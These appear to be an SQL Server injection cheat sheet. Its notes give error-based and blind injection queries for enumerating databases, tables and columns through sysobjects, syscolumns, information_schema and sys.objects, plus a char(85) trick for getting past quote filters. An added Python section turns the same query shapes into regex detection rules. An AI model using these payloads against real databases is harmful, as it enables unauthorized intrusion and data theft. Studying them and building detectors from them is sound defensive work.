Query the current database name
select convert(int, db_name())
sysobjects
Query the table ids in the current database
select id from sysobjects where xtype = 'u' // note down the table id here
syscolumns
Query the columns of the corresponding table
select * from syscolumns where id = xxxx // the id found above
select top 1 name from syscolumns where id = 2105058535 and name not in (select top 1 name from syscolumns where id = 2105058535) // TOP and NOT IN are used to limit the rows returned
select top 1 username from test1 where username not in (select top 1 username from test1)
select top 1 username from test1 where id not in (select top 0 username from test1)
information_schema
Query tables
select table_name from information_schema.tables where table_schema = 'dbo'
Query columns
select column_name from information_schema.columns where table_name = 'test1'
About sys.objects and sys.columns
These two tables can also be used for injection. They seem to exist in SQL Server 2005 and later. In an earlier project I encountered an injection point where sysobjects and information_schema were filtered, and these two tables alone were enough to carry out the injection.
Get the column names by object_id
Most real injections are blind, and union queries are rarely usable in practice. In the blind case, the object id of the target table can be determined with a comparison:
(select object_id from sys.objects where name = 'XXX') > xxxx // xxxx is the object id being tested
2: Injection without single quotes
I had not taken this into account in earlier study; a recent project ran into the single-quote case, as follows.
First, enumerate the ids from sysobjects
select id from (select id from sysobjects where xtype = char(85)) as b where id > 2000000000
The usual case
select * from aab where id = 1 and (select id from sysobjects where xtype = char(85)) > 10000000000
That is the general idea; other cases are similar.
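For defenders, the catalog names and query shapes in these notes can be turned into a classifier for logged statements or request parameters. This is an added example, not part of the original notes; the rule names, function names and sample values are constructed here. It covers every catalog the notes mention, since filtering only sysobjects and information_schema was not enough, and it decodes CHAR(n) so that the quote-free form matches the same rules as the quoted one.

```python
import re

# Catalog objects and query shapes named on this page. A filter that lists only
# some of them (sysobjects, information_schema) misses sys.objects/sys.columns.
RULES = {
    "catalog_legacy": re.compile(r"\bsys(objects|columns)\b"),
    "catalog_sys_views": re.compile(r"\bsys\s*\.\s*(objects|columns)\b"),
    "catalog_info_schema": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b"),
    "error_based_cast": re.compile(r"\bconvert\s*\(\s*int\s*,\s*db_name\s*\(\s*\)\s*\)"),
    "top_not_in_paging": re.compile(r"\btop\s+\d+\b.*\bnot\s+in\s*\(\s*select\s+top\s+\d+\b"),
    "xtype_user_tables": re.compile(r"\bxtype\s*=\s*'u'"),
}
CHAR_CALL = re.compile(r"\bn?char\s*\(\s*(\d{1,3})\s*\)")


def normalize(text):
    """Lowercase, collapse whitespace, and decode CHAR(n) into a quoted literal."""
    text = re.sub(r"\s+", " ", text.lower()).strip()
    # CHAR(85) and 'U' are the same value to the server, so match them alike.
    return CHAR_CALL.sub(lambda m: "'" + chr(int(m.group(1))).lower() + "'", text)


def classify(text):
    """Return the sorted names of the rules that match one logged value."""
    norm = normalize(text)
    hits = {name for name, rx in RULES.items() if rx.search(norm)}
    if CHAR_CALL.search(text.lower()):
        hits.add("char_encoded_literal")  # quote-free literal, worth its own flag
    return sorted(hits)


# Constructed sample values (not captured traffic), modelled on the page's queries.
SAMPLES = [
    "id=1 and (select id from sysobjects where xtype=CHAR(85))>10000000000",
    "id=1 and (select object_id from sys.objects where name='XXX')>1",
    "select username from test1 where id = 42",
]

if __name__ == "__main__":
    for value in SAMPLES:
        print(classify(value) or ["clean"], "<-", value)
```

Pattern matching of this kind is a detection aid for logs and alerts; the fix at the injection point itself is a parameterized query.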